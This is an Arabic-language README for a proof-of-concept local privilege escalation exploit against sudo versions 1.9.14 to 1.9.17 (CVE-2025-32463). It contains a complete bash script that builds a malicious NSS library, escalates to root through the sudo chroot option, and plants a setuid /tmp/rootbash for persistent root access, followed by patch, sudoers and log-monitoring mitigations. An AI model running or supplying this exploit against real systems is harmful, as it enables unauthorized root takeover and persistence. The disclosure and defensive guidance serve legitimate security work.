
استغلال تصعيد الامتيازات المحلية لـ CVE-2025-32463 الذي يستهدف عيب تصميم sudo chroot. يوفر سكريبت PoC، وتحليلاً تقنياً، وإرشادات التخفيف لإصدارات sudo المتأثرة 1.9.14-1.9.17.
CVE-2025-32463 هي ثغرة حرجة لتصعيد الامتيازات المحلية في إصدارات sudo من 1.9.14 إلى 1.9.17. تسمح هذه الثغرة للمهاجمين الذين لديهم امتيازات sudo بتصعيد الوصول إلى صلاحيات الجذر عن طريق استغلال عيب في تصميم منطق معالجة خيار chroot.
تحدث الثغرة بسبب مشكلة توقيت في عملية التحقق الأمني لـ sudo. يتم تنفيذ وظيفة pivot_root قبل التحقق من سياسة الأمان، مما يسمح للمهاجمين بالتلاعب ببيئة نظام الملفات التي يستخدمها sudo للمصادقة والترخيص.
nsswitch.conf خبيثpivot_root: يتم تنفيذها في وقت مبكر جدًا من العمليةset_cmnd_path: تعمل في البيئة التي تم التلاعب بهاcommand_matches: يتم تجاوز الفحوصات الأمنية بسبب التلاعب بالبيئةقبل استخدام هذا الاستغلال، تأكد من استيفاء الشروط التالية:
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
chmod +x cve-2025-32463.sh
./cve-2025-32463.sh
تحقق مما إذا كان النظام المستهدف معرضًا للخطر:
# Check sudo version
sudo --version
# Check sudo privileges
sudo -l
# Look for chroot-related permissions
sudo -l | grep chroot
البرنامج النصي الرئيسي للاستغلال (cve-2025-32463.sh):
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit
STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
system("id > /tmp/pwned_proof.txt");
system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
execl("/bin/bash", "/bin/bash", NULL);
}
CEOF
mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c
echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest
# Cleanup
rm -rf ${STAGE?}
بعد الاستغلال الناجح، تحقق من وصول الجذر:
# Check current privileges
whoami
# Check proof file
cat /tmp/pwned_proof.txt
# Use setuid bash for persistent root access
/tmp/rootbash -p
تحديث sudo إلى الإصدار 1.9.17p1 أو أحدث:
# Ubuntu/Debian
sudo apt update && sudo apt upgrade sudo
# CentOS/RHEL
sudo yum update sudo
# or
sudo dnf update sudo
إزالة توجيهات chroot من sudoers (حل مؤقت):
# Backup current configuration
sudo cp /etc/sudoers /etc/sudoers.backup
# Remove chroot-related entries
sudo sed -i '/chroot/d' /etc/sudoers
# Verify syntax
sudo visudo -c
مراقبة محاولات الاستغلال:
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d
# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo
# Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f
تنشأ الثغرة من عيب في تصميم تدفق تنفيذ sudo:
التدفق الطبيعي المتوقع:
التدفق الضعيف الفعلي:
يستغل الاستغلال نظام تبديل خدمة الأسماء (NSS):
/etc/nsswitch.conf لمصادقة المستخدمتم اختبار هذا الاستغلال على:
⚠️ إخلاء مسؤولية مهم ⚠️
هذه الأداة مقدمة لأغراض تعليمية واختبارية مصرح بها فقط.
المساهمات مرحب بها! يرجى:
هذا المشروع مرخص بموجب رخصة MIT - انظر ملف LICENSE للتفاصيل.
ملاحظة: تؤثر هذه الثغرة على مكون نظام حاسم. يرجى الاستخدام بمسؤولية والتأكد من أن جميع الاختبارات مصرح بها.